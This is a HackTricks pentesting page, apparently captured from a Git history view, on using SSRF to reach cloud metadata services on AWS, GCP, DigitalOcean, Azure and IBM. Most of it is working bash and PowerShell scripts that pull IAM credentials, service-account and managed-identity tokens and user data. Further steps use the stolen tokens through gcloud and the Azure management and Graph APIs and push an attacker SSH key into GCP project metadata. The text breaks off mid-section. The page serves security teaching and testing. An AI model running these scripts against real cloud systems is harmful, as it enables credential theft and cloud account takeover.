hacktricks/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md

593 lines
28 KiB
Markdown
Raw Normal View History

2022-05-02 18:53:13 +00:00
# Cloud SSRF
2022-04-28 16:01:33 +00:00
<details>
2024-01-01 17:15:10 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-01-01 17:15:10 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-09-25 14:14:17 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-01-01 17:15:10 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2023-09-02 23:51:32 +00:00
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
2022-05-02 18:53:13 +00:00
## AWS
2022-04-28 16:01:33 +00:00
2022-05-02 18:53:13 +00:00
### Abusing SSRF in AWS EC2 environment
2022-02-13 12:30:13 +00:00
2022-05-08 19:05:00 +00:00
**The metadata** endpoint can be accessed from inside any EC2 machine and offers interesting information about it. It's accesible in the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
There are **2 versions** of the metadata endpoint. The **first** one allows to **access** the endpoint via **GET** requests (so any **SSRF can exploit it**). For the **version 2**, [IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html), you need to ask for a **token** sending a **PUT** request with a **HTTP header** and then use that token to access the metadata with another HTTP header (so it's **more complicated to abuse** with a SSRF).
{% hint style="danger" %}
Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
Moreover, **IMDSv2** will also **block requests to fetch a token that include the `X-Forwarded-For` header**. This is to prevent misconfigured reverse proxies from being able to access it.
{% endhint %}
2022-06-02 13:49:01 +00:00
2022-05-08 19:06:42 +00:00
You can find information about the [metadata endpoints in the docs](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html). In the following script some interesting information is obtained from it:
2022-05-08 19:05:00 +00:00
```bash
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
URL="http://169.254.169.254/latest/meta-data"
aws_req=""
if [ "$(command -v curl)" ]; then
2022-09-01 11:07:00 +00:00
aws_req="curl -s -f -H '$HEADER'"
2022-05-08 19:05:00 +00:00
elif [ "$(command -v wget)" ]; then
2022-09-01 11:07:00 +00:00
aws_req="wget -q -O - -H '$HEADER'"
2022-05-08 19:05:00 +00:00
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
2022-09-01 11:07:00 +00:00
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Account Info"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
eval $aws_req "http://169.254.169.254/latest/dynamic/instance-identity/document"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Network Info"
2022-09-01 11:07:00 +00:00
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
2022-05-08 19:05:00 +00:00
echo "Mac: $mac"
2022-09-01 11:07:00 +00:00
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
done
echo ""
2022-05-11 10:13:29 +00:00
echo "IAM Role"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/iam/info"
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
2022-05-08 19:05:00 +00:00
echo "Role: $role"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
done
echo ""
2022-05-11 10:13:29 +00:00
echo "User Data"
2022-05-08 19:05:00 +00:00
# Search hardcoded credentials
2022-09-01 11:07:00 +00:00
eval $aws_req "http://169.254.169.254/latest/user-data"
2022-10-28 09:19:40 +00:00
echo ""
echo "EC2 Security Credentials"
eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
2022-02-13 12:30:13 +00:00
```
2022-10-28 09:19:40 +00:00
As a **publicly available IAM credentials** exposed example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
You can also check public **EC2 security credentials** in: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
2022-02-13 12:30:13 +00:00
2022-05-08 19:05:00 +00:00
You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do.
2022-02-13 12:30:13 +00:00
To take advantage of the new credentials, you will need to crate a new AWS profile like this one:
```
[profilename]
aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
```
2022-05-08 19:05:00 +00:00
Notice the **aws\_session\_token**, this is indispensable for the profile to work.
2022-02-13 12:30:13 +00:00
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
2022-05-02 18:53:13 +00:00
### SSRF in AWS ECS (Container Service) credentials
2022-02-13 12:30:13 +00:00
**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
2022-06-01 15:39:15 +00:00
If you access _**http://169.254.170.2/v2/credentials/\<GUID>**_ you will find the credentials of the ECS machine. But first you need to **find the \<GUID>**. To find the \<GUID> you need to read the **environ** variable **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** inside the machine.\
2022-06-02 17:00:34 +00:00
You could be able to read it exploiting an **Path Traversal** to `file:///proc/self/environ`\
2022-06-01 15:39:15 +00:00
The mentioned http address should give you the **AccessKey, SecretKey and token**.
2022-02-13 12:30:13 +00:00
```bash
2022-06-02 12:02:53 +00:00
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
2022-02-13 12:30:13 +00:00
```
2022-06-01 15:39:15 +00:00
{% hint style="info" %}
2022-06-02 13:49:01 +00:00
Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
2022-06-01 15:39:15 +00:00
{% endhint %}
2022-05-11 11:17:22 +00:00
### SSRF for AWS Lambda <a href="#6f97" id="6f97"></a>
2022-07-27 16:08:17 +00:00
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
The **name** of the **interesting env variables** are:
* `AWS_SESSION_TOKEN`
* `AWS_SECRET_ACCESS_KEY`
* `AWS_ACCES_KEY_ID`
2022-07-27 16:21:20 +00:00
Moreover, in addition to IAM credentials, Lambda functions also have **event data that is passed to the function when it is started**. This data is made available to the function via the [runtime interface](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html) and could contain **sensitive** **information** (like inside the **stageVariables**). Unlike IAM credentials, this data is accessible over standard SSRF at **`http://localhost:9001/2018-06-01/runtime/invocation/next`**.
2022-05-11 11:17:22 +00:00
2022-06-02 16:20:19 +00:00
{% hint style="warning" %}
Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
{% endhint %}
2022-05-02 18:53:13 +00:00
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
2022-02-13 12:30:13 +00:00
We retrieve the `accountId` and `region` from the API.
```
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL)
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
2022-05-02 18:53:13 +00:00
## GCP <a href="#6440" id="6440"></a>
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
2022-02-13 12:30:13 +00:00
2022-05-02 18:53:13 +00:00
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
* http://169.254.169.254
* http://metadata.google.internal
* http://metadata
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
Interesting endpoints to extract information:
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
```bash
# /project
2022-05-01 12:41:36 +00:00
# Project name and number
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
2022-05-01 12:41:36 +00:00
# Project attributes
2022-02-16 09:28:48 +00:00
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
# /oslogin
2022-05-01 12:41:36 +00:00
# users
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/users
2022-05-01 12:41:36 +00:00
# groups
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/groups
2022-05-01 12:41:36 +00:00
# security-keys
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/security-keys
2022-05-01 12:41:36 +00:00
# authorize
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/authorize
2022-02-16 09:28:48 +00:00
# /instance
2022-05-01 12:41:36 +00:00
# Description
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
2022-05-01 12:41:36 +00:00
# Hostname
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
2022-05-01 12:41:36 +00:00
# ID
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
2022-05-01 12:41:36 +00:00
# Image
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
2022-05-01 12:41:36 +00:00
# Machine Type
2023-02-20 18:01:10 +00:00
curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/machine-type
2022-05-01 12:41:36 +00:00
# Name
2023-02-20 18:01:10 +00:00
curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/name
2022-05-01 12:41:36 +00:00
# Tags
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/scheduling/tags
2022-05-01 12:41:36 +00:00
# Zone
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/zone
2023-01-24 14:43:15 +00:00
# User data
curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
2022-05-01 12:41:36 +00:00
# Network Interfaces
2023-02-20 18:01:10 +00:00
for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
echo " IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
2022-02-16 09:28:48 +00:00
echo " ============== "
done
2022-05-01 12:41:36 +00:00
# Service Accounts
2023-02-20 18:01:10 +00:00
for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
2022-02-16 09:28:48 +00:00
echo " Name: $sa"
2023-03-03 00:11:57 +00:00
echo " Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
2022-02-16 09:28:48 +00:00
echo " ============== "
done
2022-05-01 12:41:36 +00:00
# K8s Attributtes
## Cluster location
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
2022-05-01 12:41:36 +00:00
## Cluster name
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
2022-05-01 12:41:36 +00:00
## Os-login enabled
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
2022-05-01 12:41:36 +00:00
## Kube-env
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-env
2022-05-01 12:41:36 +00:00
## Kube-labels
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
2022-05-01 12:41:36 +00:00
## Kubeconfig
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
2023-02-19 18:39:32 +00:00
# All custom project attributes
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
# All custom project attributes instance attributes
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
2022-02-13 12:30:13 +00:00
```
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
```
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
2023-01-20 15:45:29 +00:00
{% hint style="danger" %}
In order to **use the exfiltrated service account token** you can just do:
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-20 15:45:29 +00:00
# Via setup
echo "<token>" > /some/path/to/token
gcloud config set auth/access_token_file /some/path/to/token
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-22 18:27:01 +00:00
gcloud config unset auth/access_token_file
2023-01-20 15:45:29 +00:00
```
{% endhint %}
2022-05-02 18:53:13 +00:00
### Add an SSH key <a href="#3e24" id="3e24"></a>
2022-02-13 12:30:13 +00:00
Extract the token
```
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
```
Check the scope of the token
```
$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
"issued_to": "101302079XXXXX",
"audience": "10130207XXXXX",
"scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
"expires_in": 2443,
"access_type": "offline"
}
```
Now push the SSH key.
{% code overflow="wrap" %}
2023-01-20 15:45:29 +00:00
```bash
2022-02-13 12:30:13 +00:00
curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
-H "Content-Type: application/json"
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```
{% endcode %}
2022-02-13 12:30:13 +00:00
2022-05-02 18:53:13 +00:00
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
2022-02-13 12:30:13 +00:00
2022-12-13 22:52:41 +00:00
{% hint style="warning" %}
There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
{% endhint %}
2022-02-13 12:30:13 +00:00
Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
```
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
2023-09-02 23:51:32 +00:00
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
2022-05-02 18:53:13 +00:00
## Azure <a href="#cea8" id="cea8"></a>
2022-02-13 12:30:13 +00:00
2022-09-25 18:26:29 +00:00
### Azure VM
2022-02-13 12:30:13 +00:00
2022-09-25 18:26:29 +00:00
[**Docs** in here](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux).
2022-02-13 12:30:13 +00:00
2022-09-25 18:26:29 +00:00
* **Must** contain the header `Metadata: true`
* Must **not** contain an `X-Forwarded-For` header
2022-02-13 12:30:13 +00:00
{% tabs %}
{% tab title="Bash" %}
{% code overflow="wrap" %}
```bash
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
echo "Instance details"
curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION"
echo "Load Balancer details"
curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION"
echo "Management Token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://management.azure.com/"
echo "Graph token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://graph.microsoft.com/"
echo "Vault token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/"
echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/"
```
{% endcode %}
{% endtab %}
{% tab title="PS" %}
```bash
2022-09-25 18:26:29 +00:00
# Powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
2022-10-30 18:21:55 +00:00
## User data
$userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021- 01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
2022-09-25 22:19:09 +00:00
# Paths
/metadata/instance?api-version=2017-04-02
/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
/metadata/instance/compute/userData?api-version=2021-01-01&format=text
2022-02-13 12:30:13 +00:00
```
{% endtab %}
{% endtabs %}
2022-02-13 12:30:13 +00:00
2022-09-29 13:18:42 +00:00
### Azure App Service
2022-09-25 14:14:17 +00:00
From the **env** you can get the values of `IDENTITY_HEADER` _and_ `IDENTITY_ENDPOINT`. That you can use to gather a token to speak with the metadata server.
2022-10-26 12:49:19 +00:00
Most of the time, you want a token for one of these resources:
* [https://storage.azure.com](https://storage.azure.com/)
* [https://vault.azure.net](https://vault.azure.net/)
* [https://graph.microsoft.com](https://graph.microsoft.com/)
* [https://management.azure.com](https://management.azure.com/)
2022-09-25 14:14:17 +00:00
```bash
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
echo $IDENTITY_ENDPOINT
# You should also be able to find the folder:
ls /opt/microsoft
#and the file
ls /opt/microsoft/msodbcsql17
2022-09-25 14:51:27 +00:00
# Get management token
2022-09-25 14:14:17 +00:00
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:51:27 +00:00
# Get graph token
curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:14:17 +00:00
# API
# Get Subscriptions
URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
curl -H "Authorization: $TOKEN" "$URL"
# Get current permission on resources in the subscription
URL="https://management.azure.com/subscriptions/<subscription-uid>/resources?api-version=2020-10-01'"
curl -H "Authorization: $TOKEN" "$URL"
# Get permissions in a VM
URL="https://management.azure.com/subscriptions/<subscription-uid>/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/<VM-name>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
curl -H "Authorization: $TOKEN" "$URL"
```
```powershell
2022-09-25 14:51:27 +00:00
# API request in powershell to management endpoint
2022-09-25 14:14:17 +00:00
$Token = 'eyJ0eX..'
$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
2022-09-25 14:51:27 +00:00
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
# API request to graph endpoint (get enterprise applications)
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
2022-09-25 14:14:17 +00:00
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
2022-09-25 14:51:27 +00:00
# Using AzureAD Powershell module witho both management and graph tokens
$token = 'eyJ0e..'
$graphaccesstoken = 'eyJ0eX..'
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc
# Try to get current perms over resources
Get-AzResource
## The following error means that the user doesn't have permissions over any resource
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
At line:1 char:1
+ Get-AzResource
+ ~~~~~~~~~~~~~~
+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
+ FullyQualifiedErrorId :
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
2022-09-25 14:14:17 +00:00
```
2023-02-10 12:30:22 +00:00
## IBM Cloud <a href="#2af0" id="2af0"></a>
{% hint style="warning" %}
Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
{% endhint %}
{% code overflow="wrap" %}
```bash
export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\
-H "Metadata-Flavor: ibm"\
-H "Accept: application/json"\
-d '{
"expires_in": 3600
}' | jq -r '(.access_token)'`
# Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
# Get SSH keys info
